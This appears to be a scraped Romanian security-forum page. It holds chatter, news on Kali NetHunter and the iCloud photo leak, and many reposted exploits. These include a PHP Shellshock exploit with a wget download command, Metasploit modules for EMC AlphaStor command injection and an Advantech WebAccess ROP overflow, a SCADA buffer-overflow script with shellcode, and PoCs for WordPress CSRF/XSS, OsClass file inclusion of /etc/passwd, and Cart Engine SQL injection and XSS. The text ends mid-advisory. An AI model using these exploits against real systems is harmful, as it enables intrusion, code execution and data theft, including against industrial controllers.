Aerosol

Destul de ok site-ul, tema frumoasa, continutul este destul de ok (m-am uitat in mare fiindca nu ma pasioneaza ) se misca foarte bine, nu ai adaugate 1000 rahaturi pe el si nici culorile nu-s stridente, bafta in continuare cu site-ul!

)) frate engleza ta e jos rau de tot... right is: "working, but you're noob,, link working man

Doar 1 buzz la 10 secunde + nu prea se mai foloseste Y!M toti au renuntat la el! ia nu imi mai da tu pm-uri aiurea + eu am vrut sa scot in evidenta ca nimeni nu mai foloseste Y!M

Frate voi realizati cati idioti ar prefera sa ramana fara un deget pentru ultimu "model" de IPhone ... off// nici nu apare bine iphone x si ei fac deja reclama la z (p.s e doar un exemplu)

he developers of one of the most advance open source operating system for penetration testing, 'KALI Linux' have announced yesterday the release of a new Kali project, known as NetHunter, that runs on a Google Nexus device. Kali Linux is an open source Debian-based operating system for penetration testing and forensics, which is maintained and funded by Offensive Security, a provider of world-class information security training and penetration testing services. It comes wrapped with a collection of penetration testing and network monitoring tools used for testing of software privacy and security. After making its influence in hacker and security circles, Kali Linux has now been published with Kali Nethunter, a version of the security suite for Android devices. The tool is a mobile distribution designed to compromise systems via USB when installed and run on an Android phone. Kali Linux NetHunter project provides much of the power to Nexus users, those running the NetHunter penetration testing platform can now launch attacks including Teensy keyboard via HID style attacks and BadUSB man-in-the-middle (MITM) networking attacks via USB human interface device (HID), wireless 802.11 frame injection, and could setup evil access points in a single click. Nethunter is currently available for Nexus devices only, but builds for other Android devices are likely on the way. Nethunter contained a full Kali Linux toolset, including support for self destruction, software defined radio and the ability to launch a Kali desktop VNC session on Nexus phone. The tools are designed for use by an attacker who has physical access to a device — an insider threat — or someone who gains access through social engineering, tailing etc. On one hand, Teensy Keyboard attacks on PCs can be used to automatically elevate privileges on a Windows PC and install a reverse-HTTP tunnel to a remote workstation. On the other hand, BadUSB can force a Windows PC to recognize the USB-connected phone as a network adapter and re-route all the traffic of the PC through it for monitoring purposes. Additionally, the Kali NetHunter configuration interface helps users to easily manage complex configuration files through a local web interface, which together with 802.11 wireless injection and a pre-configured connect VPN service make it a “formidable network security tool or discrete drop box – with Kali Linux at the tip of your fingers wherever you are.” Kali NetHunter open source security platform supports Nexus 10 and 7 tablets and Nexus 5 phones built on the existing Kali (formerly Backtrack) Linux platform. The official Kali NetHunter images can be downloaded from the Offensive Security NetHunter download page. Source

Site-ul Daily Dot a intrat in posesia unor emiluri care arata ca Apple stia de bresele de securitate ale serviciului iCloud cu cateva luni inainte sa apara sute de fotografii nud cu celebritati, care fusesera furate de pe conturile persoanale ale acestora. Emailurile arata discutiile dintre un cercetator pe probleme de securitate din Londra, Ibrahim Balic, si angajati ai companiei Apple. In cadrul discutiei, Balic spune ca a gasit o modalitate de a evita securitatea serviciului iCloud si ar putea efectua "atacuri" asupra conturilor. Metoda se bazeaza pe ghicitul unui numar mare de parole, cu ajutorul unui software automatizat. Desi metoda folosita de hackerii implicati in scandalul fotografiilor nud ale celebritatilor este necunoscuta, expertii in securitate spun ca au fost folosite metode de "forta bruta", combinate cu atacuri orientate de "phising" (pacalirea utilizatorilor in asa fel incat acestia sunt redirectionati catre pagini suspecte cu un URL diferit). Balic a trimis primul email companiei Apple in luna martie si a continuat discutiile cu angajatii specializati pe probleme de securitate pana pe 6 mai. Desi nu au fost dezvaluite toate emailurile schimbate, The Daily Dot raporteaza ca in acest moment, "vulnerabilitatea ramane aparent nerezolvata". Emailul trimis catre Balic sugereaza ca cei de la Apple doreau sa afle mai multe detalii despre bresa de securitate: "Buna Ibrahim, folosind informatia pe care ne-ai oferit-o, se pare ca ar dura foarte mult sa gasim un semn valid de autentificare pentru un cont. Credeti ca aveti o metoda pentru accesarea unui cont intr-o perioada de timp rezonabila?" Un defect similar a fost evidentiat si de catre site-ul tech The Next web, dupa publicarea fotografiilor persoanale ale cerlebritatilor Jennifer Lawrence, Kate Upton si Ariana Grande. Compania a negat ca problema ar fi legata de sparegerea conturilor. Ulterior, compania Apple a recunoscut ca respectivele conturi au fost "compromise", dar a specificat ca vina apartine securitatii pe care utilizatorii o folosesc. "Niciunul dintre cazurile pe care le-am investigat nu a avut loc ca urmare a unei brese a unor sisteme Apple, inclusiv iCloud sau Find my iPhone", a comunicat compania pe 1 septembrie. "Continuam sa lucram cu ogranele specializate pentru a putea identifica infractorii implicati". Raspunsul companiei a fost criticat de experti, care considera ca Apple avea o datorie fata de clientii sai si ca marile companii tech nu ar trebui sa presupuna ca utilizatorul obisnuit este constient de cele mai bune practici de securitate. Cu toate acestea, daca emailurile publicate recent se dovedesc a fi legitime, Apple ar trebuie sa ofere utilizatorilor o explicatie in ceea ce priveste reactia companiei in fata posibilelor probleme si defecte detectate, noteaza The Independent. "Daca Apple ar fi luat aceasta problema in serios poate astfel de probleme nu ar fi aparut", a declarat Ibrahim pentru Daily Dot. Source

Symantec pune la dispozitia organizatiilor Data Breach Risk Calculator, un instrument util care permite companiilor sa determine impactul unei brese de securitate asupra activitatii lor si pierderile pe care le-ar putea suferi in situatia unui atac informatic. Calculatorul estimeaza nivelul de expunere a unei organizatii la brese de securitate si probabilitatea ca o bresa sa afecteze compania respectiva in urmatoarele 12 luni, oferind o estimare a costurilor pentru fiecare informatie pierduta, precum si pierderile totale suferite de companie in cazul unei brese. Data Breach Risk Calculator se bazeaza pe tendintele din industrie si informatiile colectate de Symantec inca din 2005, cand compania de cercetare Ponemon Institute a inceput sa examineze pierderile survenite in organizatii din diferite industrii, ca urmare a unei brese de securitate. Riscul breselor si pierderile de date confidentiale sunt in continua crestere – in prezent, o bresa genereaza, in medie, pierderi de 5,5 milioane de dolari pentru o companie, costul pentru fiecare informatie confidentiala compromisa fiind de 194 de dolari, potrivit unui studiu realizat anul trecut de Ponemon Institute. Calculatorul cuprinde 13 intrebari si, in baza raspunsurilor furnizate de companii, determina riscul ca o bresa de securitate sa survina in organizatie si costurile estimate ale pierderii de date in eventualitatea unui incident de securitate, sprijinind astfel organizatiile sa inteleaga riscurile la care sunt expuse si sa obtina informatii pentru a preveni bresele de securitate. Data Breach Risk Calculator este un instrument disponibil la nivel mondial si ofera informatii in moneda nationala companiilor din Australia, Franta, Italia, India, Germania, Japonia, Marea Britanie si SUA, in timp ce organizatiile din toata lumea au posibilitatea sa calculeze valoarea estimata a pierderilor survenite ca urmare a unei brese de securitate in dolari. Data Breach Risk Calculator poate fi accesat aici. Source

Mai greseste omul nu toti ne-am nascut invatati, in loc sa critici incearca sa faci ceva constructiv... Ce daca omu' e din 2007 poate ca nu stia ce si cum nu trebuie sa il judeci.

Nu vreau sa o dam in offtopic dar tipa arata chiar bine ) + faza cu "scapatul" pozelor e la moda nu numai printre vedete ci si printre minorele ce isi fac poze pentru iubitii lor si cand apar pe net, vai au fost furate

Trebuie sa pui o litera mare la inceput ex : Parola + numere / ( Parola123 )

E destul de frumoasa tema, bafta cu site-ul... @Lazx si tu la fel nu va mai certati aiurea

bine au facut ce sa ceri de la niste copii...

Trebuie sa fi complet bolnav cu capu' sa dai 50 bulioane pe un telefon.

1. Sherlock 2. NCIS Cam astea ...

<?php /* Title: Bash Specially-crafted Environment Variables Code Injection Vulnerability CVE: 2014-6271 Vendor Homepage: https://www.gnu.org/software/bash/ Author: Prakhar Prasad && Subho Halder Author Homepage: https://prakharprasad.com && https://appknox.com Date: September 25th 2014 Tested on: Mac OS X 10.9.4/10.9.5 with Apache/2.2.26 GNU bash, version 3.2.51(1)-release (x86_64-apple-darwin13) Usage: php bash.php -u http://<hostname>/cgi-bin/<cgi> -c cmd Eg. php bash.php -u http://localhost/cgi-bin/hello -c "wget http://appknox.com -O /tmp/shit" Reference: https://www.reddit.com/r/netsec/comments/2hbxtc/cve20146271_remote_code_execution_through_bash/ Test CGI Code : #!/bin/bash echo "Content-type: text/html" echo "" echo "Bash-is-Vulnerable" */ error_reporting(0); if(!defined('STDIN')) die("Please run it through command-line!\n"); $x = getopt("u:c:"); if(!isset($x['u']) || !isset($x['c'])) { die("Usage: ".$_SERVER['PHP_SELF']." -u URL -c cmd\n"); } $url = $x['u']; $cmd = $x['c']; $context = stream_context_create( array( 'http' => array( 'method' => 'GET', 'header' => 'User-Agent: () { :;}; /bin/bash -c "'.$cmd.'"' ) ) ); $req = file_get_contents($url, false, $context); if(!$req && strpos($http_response_header[0],"500") > 0 ) die("Command sent to the server!\n"); else if($req && !strpos($http_response_header[0],"500") > 0) die("Server didn't respond as it should!\n"); else if(!$req && $http_response_header == NULL) die("A connection error occurred!\n") ?> Source

Exploit Database Note: The following is an excerpt from: https://securityblog.redhat.com/2014/09/24/bash-specially-crafted-environment-variables-code-injection-attack/ Like “real” programming languages, Bash has functions, though in a somewhat limited implementation, and it is possible to put these bash functions into environment variables. This flaw is triggered when extra code is added to the end of these function definitions (inside the enivronment variable). Something like: $ env x='() { :;}; echo vulnerable' bash -c "echo this is a test" vulnerable this is a test The patch used to fix this flaw, ensures that no code is allowed after the end of a bash function. So if you run the above example with the patched version of bash, you should get an output similar to: $ env x='() { :;}; echo vulnerable' bash -c "echo this is a test" bash: warning: x: ignoring function definition attempt bash: error importing function definition for `x' this is a test Source

require 'msf/core' class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient def initialize(info = {}) super(update_info(info, 'Name' => 'bashedCgi', 'Description' => %q{ Quick & dirty module to send the BASH exploit payload (CVE-2014-6271) to CGI scripts that are BASH-based or invoke BASH, to execute an arbitrary shell command. }, 'Author' => [ 'Stephane Chazelas', # vuln discovery 'Shaun Colley <scolley at ioactive.com>' # metasploit module ], 'License' => MSF_LICENSE, 'References' => [ 'CVE', '2014-6271' ], 'Targets' => [ [ 'cgi', {} ] ], 'DefaultTarget' => 0, 'Payload' => { 'Space' => 1024, 'DisableNops' => true }, 'DefaultOptions' => { 'PAYLOAD' => 0 } )) register_options( [ OptString.new('TARGETURI', [true, 'Absolute path of BASH-based CGI', '/']), OptString.new('CMD', [true, 'Command to execute', '/usr/bin/touch /tmp/metasploit']) ], self.class) end def run res = send_request_cgi({ 'method' => 'GET', 'uri' => datastore['TARGETURI'], 'agent' => "() { :;}; " + datastore['CMD'] }) if res && res.code == 200 print_good("Command sent - 200 received") else print_error("Command sent - non-200 reponse") end end end Source

require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::Tcp include Msf::Exploit::CmdStager def initialize(info = {}) super(update_info(info, 'Name' => 'EMC AlphaStor Device Manager Opcode 0x75 Command Injection', 'Description' => %q{ This module exploits a flaw within the Device Manager (rrobtd.exe). When parsing the 0x75 command, the process does not properly filter user supplied input allowing for arbitrary command injection. This module has been tested successfully on EMC AlphaStor 4.0 build 116 with Windows 2003 SP2 and Windows 2008 R2. }, 'Author' => [ 'Anyway <Aniway.Anyway[at]gmail.com>', # Vulnerability Discovery 'Preston Thornburn <prestonthornburg[at]gmail.com>', # msf module 'Mohsan Farid <faridms[at]gmail.com>', # msf module 'Brent Morris <inkrypto[at]gmail.com>', # msf module 'juan vazquez' # convert aux module into exploit ], 'License' => MSF_LICENSE, 'References' => [ ['CVE', '2013-0928'], ['ZDI', '13-033'] ], 'Platform' => 'win', 'Arch' => ARCH_X86, 'Payload' => { 'Space' => 2048, 'DisableNops' => true }, 'Targets' => [ [ 'EMC AlphaStor 4.0 < build 800 / Windows Universal', {} ] ], 'CmdStagerFlavor' => 'vbs', 'DefaultTarget' => 0, 'DisclosureDate' => 'Jan 18 2013')) register_options( [ Opt::RPORT(3000) ], self.class ) end def check packet = "\x75~ mminfo & #{rand_text_alpha(512)}" res = send_packet(packet) if res && res =~ /Could not fork command/ return Exploit::CheckCode::Detected end Exploit::CheckCode::Unknown end def exploit execute_cmdstager({ :linemax => 487 }) end def execute_command(cmd, opts) padding = rand_text_alpha_upper(489 - cmd.length) packet = "\x75~ mminfo &cmd.exe /c #{cmd} & #{padding}"# #{padding}" connect sock.put(packet) begin sock.get_once rescue EOFError fail_with(Failure::Unknown, "Failed to deploy CMD Stager") end disconnect end def execute_cmdstager_begin(opts) if flavor =~ /vbs/ && self.decoder =~ /vbs_b64/ cmd_list.each do |cmd| cmd.gsub!(/data = Replace\(data, vbCrLf, ""\)/, "data = Replace(data, \" \" + vbCrLf, \"\")") end end end def send_packet(packet) connect sock.put(packet) begin meta_data = sock.get_once(8) rescue EOFError meta_data = nil end unless meta_data disconnect return nil end code, length = meta_data.unpack("N*") unless code == 1 disconnect return nil end begin data = sock.get_once(length) rescue EOFError data = nil ensure disconnect end data end end Source

## # This module requires Metasploit: http//metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::BrowserExploitServer def initialize(info = {}) super(update_info(info, 'Name' => 'Advantech WebAccess dvs.ocx GetColor Buffer Overflow', 'Description' => %q{ This module exploits a buffer overflow vulnerability in Advantec WebAccess. The vulnerability exists in the dvs.ocx ActiveX control, where a dangerous call to sprintf can be reached with user controlled data through the GetColor function. This module has been tested successfully on Windows XP SP3 with IE6 and Windows 7 SP1 with IE8 and IE 9. }, 'License' => MSF_LICENSE, 'Author' => [ 'Unknown', # Vulnerability discovery 'juan vazquez' # Metasploit module ], 'References' => [ ['CVE', '2014-2364'], ['ZDI', '14-255'], ['URL', 'http://ics-cert.us-cert.gov/advisories/ICSA-14-198-02'] ], 'DefaultOptions' => { 'Retries' => false, 'InitialAutoRunScript' => 'migrate -f' }, 'BrowserRequirements' => { :source => /script|headers/i, :os_name => Msf::OperatingSystems::WINDOWS, :ua_name => /MSIE/i, :ua_ver => lambda { |ver| Gem::Version.new(ver) < Gem::Version.new('10') }, :clsid => "{5CE92A27-9F6A-11D2-9D3D-000001155641}", :method => "GetColor" }, 'Payload' => { 'Space' => 1024, 'DisableNops' => true, 'BadChars' => "\x00\x0a\x0d\x5c", # Patch the stack to execute the decoder... 'PrependEncoder' => "\x81\xc4\x9c\xff\xff\xff", # add esp, -100 # Fix the stack again, this time better , before the payload # is executed. 'Prepend' => "\x64\xa1\x18\x00\x00\x00" + # mov eax, fs:[0x18] "\x83\xC0\x08" + # add eax, byte 8 "\x8b\x20" + # mov esp, [eax] "\x81\xC4\x30\xF8\xFF\xFF" # add esp, -2000 }, 'Platform' => 'win', 'Arch' => ARCH_X86, 'Targets' => [ [ 'Automatic', { } ] ], 'DefaultTarget' => 0, 'DisclosureDate' => 'Jul 17 2014')) end def on_request_exploit(cli, request, target_info) print_status("Requested: #{request.uri}") content = <<-EOS <html> <head> <meta http-equiv="cache-control" content="max-age=0" /> <meta http-equiv="cache-control" content="no-cache" /> <meta http-equiv="expires" content="0" /> <meta http-equiv="expires" content="Tue, 01 Jan 1980 1:00:00 GMT" /> <meta http-equiv="pragma" content="no-cache" /> </head> <body> <object classid='clsid:5CE92A27-9F6A-11D2-9D3D-000001155641' id='test' /></object> <script language='javascript'> test.GetColor("#{rop_payload(get_payload(cli, target_info))}", 0); </script> </body> </html> EOS print_status("Sending #{self.name}") send_response_html(cli, content, {'Pragma' => 'no-cache'}) end # Uses gadgets from ijl11.dll 1.1.2.16 def rop_payload(code) xpl = rand_text_alphanumeric(61) # offset xpl << [0x60014185].pack("V") # RET xpl << rand_text_alphanumeric(8) # EBX = dwSize (0x40) xpl << [0x60012288].pack("V") # POP ECX # RETN xpl << [0xffffffff].pack("V") # ecx value xpl << [0x6002157e].pack("V") # POP EAX # RETN xpl << [0x9ffdafc9].pack("V") # eax value xpl << [0x60022b97].pack("V") # ADC EAX,60025078 # RETN xpl << [0x60024ea4].pack("V") # MUL EAX,ECX # RETN 0x10 xpl << [0x60018084].pack("V") # POP EBP # RETN xpl << rand_text_alphanumeric(4) # padding xpl << rand_text_alphanumeric(4) # padding xpl << rand_text_alphanumeric(4) # padding xpl << rand_text_alphanumeric(4) # padding xpl << [0x60029f6c].pack("V") # .data ijl11.dll xpl << [0x60012288].pack("V") # POP ECX # RETN xpl << [0x60023588].pack("V") # ECX => (&POP EBX # RETN) xpl << [0x6001f1c8].pack("V") # push edx # or al,39h # push ecx # or byte ptr [ebp+5], dh # mov eax, 1 # ret # EDX = flAllocationType (0x1000) xpl << [0x60012288].pack("V") # POP ECX # RETN xpl << [0xffffffff].pack("V") # ecx value xpl << [0x6002157e].pack("V") # POP EAX # RETN xpl << [0x9ffdbf89].pack("V") # eax value xpl << [0x60022b97].pack("V") # ADC EAX,60025078 # RETN xpl << [0x60024ea4].pack("V") # MUL EAX,ECX # RETN 0x10 # ECX = flProtect (0x40) xpl << [0x6002157e].pack("V") # POP EAX # RETN xpl << rand_text_alphanumeric(4) # padding xpl << rand_text_alphanumeric(4) # padding xpl << rand_text_alphanumeric(4) # padding xpl << rand_text_alphanumeric(4) # padding xpl << [0x60029f6c].pack("V") # .data ijl11.dll xpl << [0x60012288].pack("V") # POP ECX # RETN xpl << [0xffffffff].pack("V") # ecx value 0x41.times do xpl << [0x6001b8ec].pack("V") # INC ECX # MOV DWORD PTR DS:[EAX],ECX # RETN end # EAX = ptr to &VirtualAlloc() xpl << [0x6001db7e].pack("V") # POP EAX # RETN [ijl11.dll] xpl << [0x600250c8].pack("V") # ptr to &VirtualAlloc() [IAT ijl11.dll] # EBP = POP (skip 4 bytes) xpl << [0x6002054b].pack("V") # POP EBP # RETN xpl << [0x6002054b].pack("V") # ptr to &(# pop ebp # retn) # ESI = ptr to JMP [EAX] xpl << [0x600181cc].pack("V") # POP ESI # RETN xpl << [0x6002176e].pack("V") # ptr to &(# jmp[eax]) # EDI = ROP NOP (RETN) xpl << [0x60021ad1].pack("V") # POP EDI # RETN xpl << [0x60021ad2].pack("V") # ptr to &(retn) # ESP = lpAddress (automatic) # PUSHAD # RETN xpl << [0x60018399].pack("V") # PUSHAD # RETN xpl << [0x6001c5cd].pack("V") # ptr to &(# push esp # retn) xpl << code xpl.gsub!("\"", "\\\"") # Escape double quote, to not break javascript string xpl.gsub!("\\", "\\\\") # Escape back slash, to avoid javascript escaping xpl end end Source

## Exploit Title: WS10 Data Server SCADA Exploit Overflow PoC ## Date: 09/23/2014 ## Author: Pedro Sánchez ## Version: 1.83 (English) ## Tested on: Windows 7 embedded. ## Notified the vendor, vendor never responded. ## In the new version this PoC stops working ## Vendor: Novus ## http://www.novus.com.br ## NOVUS Electronics is a manufacturer of instruments for control, data acquisition and supervisory systems, mainly for factory automation import os import socket import sys ## The process listens on TCP port 2001 host = sys.argv[1] port = int(sys.argv[2]) print " PoC WS10 Data Server SCADA Exploit " print " Pedro Sanchez " shellcode = ("\x33\xC0\x50\x68\x63\x61\x6C\x63\x54\x5B\x50\x53\xB9\x44\x80\xc2\x77\xFF\xD1\x90\x90") ## Exploit contructor ws10 = ("\x90" * 1024 + "\x44" * 31788) ws10 += ("\xeb\x14") ws10 += ("\x44" * 6) ws10 += ("\xad\xbb\xc3\x77") ws10 += ("\xb4\x73\xed\x77") ws10 += ("\x90" * 21) ws10 += shellcode print " [+] Sending payload..." s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((host,port)) s.send(ws10) data = s.recv(1024) print " [+] Closing..." s.close() print " [+] Done!" Source

Details ================ Software: Login Widget With Shortcode Version: 3.1.1 Homepage: http://wordpress.org/plugins/login-sidebar-widget/ Advisory report: https://security.dxw.com/advisories/csrfxss-vulnerablity-in-login-widget-with-shortcode-allows-unauthenticated-attackers-to-do-anything-an-admin-can-do/ CVE: Awaiting assignment CVSS: 6.8 (Medium; AV:N/AC:M/Au:N/C:P/I:P/A:P) Description ================ CSRF/XSS vulnerablity in Login Widget With Shortcode allows unauthenticated attackers to do anything an admin can do Vulnerability ================ This plugin is vulnerable to a combination CSRF/XSS attack. An attacker able to convince an admin to visit a link of their choosing is able to insert arbitrary HTML into an admin page. Using that ability they can use JavaScript to control an admin user’s browser, allowing the attacker to create user accounts, create posts, delete all posts, etc. Proof of concept ================ If a logged-in administrator user clicks the submit button on this form, a javascript alert will display in the admin screens. (In a real attack the form can be made to auto-submit using Javascript). <form method=\"POST\" action=\"http://localhost/wp-admin/options-general.php?page=login_widget_afo\"> <input type=\"text\" name=\"custom_style_afo\" value=\"</textarea><script>alert(1)</script>\"> <input type=\"text\" name=\"option\" value=\"login_widget_afo_save_settings\"> <input type=\"submit\"> </form> Mitigations ================ Upgrade to version 3.2.1 or later. Disclosure policy ================ dxw believes in responsible disclosure. Your attention is drawn to our disclosure policy: https://security.dxw.com/disclosure/ Please contact us on security@dxw.com to acknowledge this report if you received it via a third party (for example, plugins@wordpress.org) as they generally cannot communicate with us on your behalf. This vulnerability will be published if we do not receive a response to this report with 14 days. Timeline ================ 2014-08-26: Discovered 2014-09-15: Reported to vendor by email 2014-09-15: Vendor reported the issue fixed and a new version released 2014-09-17: Published Discovered by dxw: ================ Tom Adams Please visit security.dxw.com for more information. Source

Information ----------- Advisory by Netsparker. Name : LFI Vulnerability in OsClass Affected Software : OsClass Affected Versions: 3.4.1 and possibly below Vendor Homepage : http://osclass.org/ Vulnerability Type : Local File Inclusion Severity : Critical CVE-ID: CVE-2014-6308 Netsparker Advisory Reference : NS-14-031 Advisory URL ------------ https://www.netsparker.com/lfi-vulnerability-in-osclass/ Description ----------- Local file inclusion vulnerability where discovered in Osclass, an open source project that allows you to create a classifieds sites. Technical Details ----------------- Proof of Concept URL for LFI in OsClass: http://example.com/osclass/oc-admin/index.php?page=appearance&action=render&file=../../../../../../../../../../etc/passwd Advisory Timeline ----------------- 03/09/2014 - First Contact 03/09/2014 - Vulnerability fixed: https://github.com/osclass/Osclass/commit/c163bf5910d0d36424d7fc678da6b03a0e443435 15/09/2014 - Fix released publicly in Osclass 3.4.2 Credits & Authors ----------------- These issues have been discovered by Omar Kurt while testing Netsparker Web Application Security Scanner. About Netsparker ---------------- Netsparker can find and report security issues and vulnerabilities such as SQL Injection and Cross-site Scripting (XSS) in all websites and web applications regardless of the platform and the technology they are built on. Netsparker's unique detection and exploitation techniques allows it to be dead accurate in reporting hence it's the first and the only False Positive Free web application security scanner. For more information on Netsparker visit https://www.netsparker.com. Source

=== Details === Quantum Leap Advisory: http://www.quantumleap.it/cart-engine-3-0-multiple-vulnerabilities-sql-injection-reflected-xss-open-redirect/ Affected Product: Cart Engine Version: 3.0 === Executive Summary === SQL Injection: Using a specially crafted HTTP request, it is possible to exploit a lack in the validation[1] of the “item_id[0]” and “item_id[]” input parameters of cart.php page. Successful exploitation of the vulnerabilities results in read sensitive data from the database and, in some cases, execute administration operation on the database or issue commands to the operating system. Reflected XSS: Using a specially crafted HTTP request, it is possible to exploit a lack in the neutralization[2] of multiple pages output which includes the user submitted content. Successful exploitation of the vulnerabilities, results in the execution of arbitrary HTML and script code in the user’s browser in the context of the victim user's session trough a “Reflected XSS”. Open Redirect: Using a specially crafted HTTP request, it is possible to redirect[3] the normal browsing of users to a malicious site by modifying untrusted URL input in Referer HTTP header parameter in index.php, cart.php, msg.php and page.php pages. Successful exploitation of the vulnerabilities results in phishing scam, user credential theft, malware dissemination. === Proof of Concept === = SQL Injection (based on MySQL) = A SQL Injection vulnerability has been detected on cart.php page in Cart Engine CMS. The function “sql_query” in file “cart.php” doesn’t sanitize the “$item_id” parameter, so error based and boolean-based blind or time-based blind SQL Injection attacks can be executed. ## HTTP REQUEST - injection on item_id[0] parameter ## POST /cart.php HTTP/1.1 Host: eshop.hacme.hac User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:24.0) Gecko/20140722 Firefox/24.0 Iceweasel/24.7.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://eshop.hacme.hac/detail.php?item_id=8 Cookie: PHPSESSID=iost0tdmvdobp966rbppa514f3; ce3_history[0]=12; ce3_history[1]=8 Connection: keep-alive Content-Type: multipart/form-data; boundary=---------------------------109606523931762158449252347 Content-Length: 774 -----------------------------109606523931762158449252347 Content-Disposition: form-data; name="AXSRF_token" -----------------------------109606523931762158449252347 Content-Disposition: form-data; name="cmd" add -----------------------------109606523931762158449252347 Content-Disposition: form-data; name="item_id[0]" 8' AND (SELECT 22 FROM (SELECT COUNT(*), CONCAT(0x3a,0x3a,(SELECT user()),0x3a,0x3a,FLOOR(RAND()*2))a FROM INFORMATION_SCHEMA.columns GROUP BY a) AND 'ql'='ql -----------------------------109606523931762158449252347 Content-Disposition: form-data; name="qty[0]" 1 -----------------------------109606523931762158449252347 Content-Disposition: form-data; name="qty[0]" 1 -----------------------------109606523931762158449252347-- ## EOF HTTP REQUEST ## ## HTTP REQUEST - injection on item_id[] parameter ## POST /cart.php HTTP/1.1 Host: eshop.hacme.hac User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:24.0) Gecko/20140722 Firefox/24.0 Iceweasel/24.7.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://eshop.hacme.hac/detail.php?item_id=13 Cookie: PHPSESSID=aci236dihehpjaldchbt6k6v23; ce3_history[0]=24; ce3_history[1]=13 Connection: keep-alive Content-Type: multipart/form-data; boundary=---------------------------1948855485207142787318084006 Content-Length: 2353 -----------------------------1948855485207142787318084006 Content-Disposition: form-data; name="AXSRF_token" -----------------------------1948855485207142787318084006 Content-Disposition: form-data; name="cmd" add -----------------------------1948855485207142787318084006 Content-Disposition: form-data; name="item_id[0]" 13 -----------------------------1948855485207142787318084006 Content-Disposition: form-data; name="qty[0]" 1 -----------------------------1948855485207142787318084006 Content-Disposition: form-data; name="qty[0]" 1 -----------------------------1948855485207142787318084006 Content-Disposition: form-data; name="prod_opt_3" 3 -----------------------------1948855485207142787318084006 Content-Disposition: form-data; name="prod_opt_12" -----------------------------1948855485207142787318084006 Content-Disposition: form-data; name="item_id[]" -----------------------------1948855485207142787318084006 Content-Disposition: form-data; name="qty[]" 1 -----------------------------1948855485207142787318084006 Content-Disposition: form-data; name="item_id[]" ' AND (SELECT 22 FROM (SELECT COUNT(*), CONCAT(0x3a,0x3a,(SELECT database()),0x3a,0x3a,FLOOR(RAND()*2))a FROM INFORMATION_SCHEMA.columns GROUP BY a) AND 'ql'='ql -----------------------------1948855485207142787318084006 Content-Disposition: form-data; name="qty[]" 1 -----------------------------1948855485207142787318084006 Content-Disposition: form-data; name="item_id[]" -----------------------------1948855485207142787318084006 Content-Disposition: form-data; name="qty[]" 1 -----------------------------1948855485207142787318084006 Content-Disposition: form-data; name="item_id[]" -----------------------------1948855485207142787318084006 Content-Disposition: form-data; name="qty[]" 1 -----------------------------1948855485207142787318084006 Content-Disposition: form-data; name="item_id[]" -----------------------------1948855485207142787318084006 Content-Disposition: form-data; name="qty[]" 1 -----------------------------1948855485207142787318084006 Content-Disposition: form-data; name="item_id[]" -----------------------------1948855485207142787318084006 Content-Disposition: form-data; name="qty[]" 1 -----------------------------1948855485207142787318084006-- ## EOF HTTP REQUEST ## = Reflected XSS = A Reflected XSS vulnerability has been detected on multiple pages in Cart Engine CMS. In the file "skins/default/outline.tpl", the parameter "path" in section "drop down TOP menu (with path)" and the parameter "$print_this_page" in section "footer_content_block" are not sanitized, so an XSS attack can be executed on multiple pages. ## HTTP REQUESTS ## /index.php?"><script>alert('XSS')<%2fscript> /index.php?'%3balert('XSS')%2f%2f /checkout.php?%27%3balert%28%27XSS%27%29%2f%2f /checkout.php?%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E /contact.php?"><script>alert('XSS')<%2fscript> /contact.php?'%3balert('XSS')%2f%2f /detail.php?item_id=10&'%3balert('XSS')%2f%2f /detail.php?item_id=10&"><script>alert('XSS')<%2fscript> /distro.php?'%3balert('XSS')%2f%2f /distro.php?"><script>alert('XSS')<%2fscript> /newsletter.php?'%3balert('XSS')%2f%2f /newsletter.php?"><script>alert('XSS')<%2fscript> /page.php?pid=2&"><script>alert('XSS')<%2fscript> /page.php?pid=2&'%3balert('XSS')%2f%2f /profile.php?"><script>alert('XSS')<%2fscript> /profile.php?'%3balert('XSS')%2f%2f /search.php?mod_id=_shop&cmd=list&cat_id=1&'%3balert('XSS')%2f%2f /search.php?mod_id=_shop&cmd=list&cat_id=1&"><script>alert('XSS')<%2fscript> /sitemap.php?'%3balert('XSS')%2f%2f /sitemap.php?"><script>alert('XSS')<%2fscript> /task.php?mod=qcomment&m=gbook&i=1&t=cy9NLS5Jys%2FPBgA%3D&"><script>alert('XSS')<%2fscript> /task.php?mod=qcomment&m=gbook&i=1&t=cy9NLS5Jys%2FPBgA%3D&'%3balert('XSS')%2f%2f /tell.php?'%3balert('XSS')%2f%2f /tell.php?"><script>alert('XSS')<%2fscript> ## EOF HTTP REQUEST ## = Open Redirect = An Open Redirect vulnerability has been detected on multiple pages in Cart Engine CMS. The function "redir" in file "includes/function.php" doesn't check the "$_SERVER['HTTP_REFERER']" parameter, so an Open Redirect attack can be executed. ## HTTP REQUEST ## GET /page.php HTTP/1.1 Host: eshop.hacme.hac User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:24.0) Gecko/20140722 Firefox/24.0 Iceweasel/24.7.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://www.google.com/search?hl=en&q= Cookie: PHPSESSID=rtg5ooetpj7resie416iu9b2s6 Connection: close $ cat openredirect.req | nc -vvv eshop.hacme.hac 80 hacme.hac [10.0.2.80] 80 (http) open HTTP/1.1 302 Found Date: Sun, 10 Aug 2014 15:16:34 GMT Server: Apache/2.2.15 (CentOS) X-Powered-By: PHP/5.3.3 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: 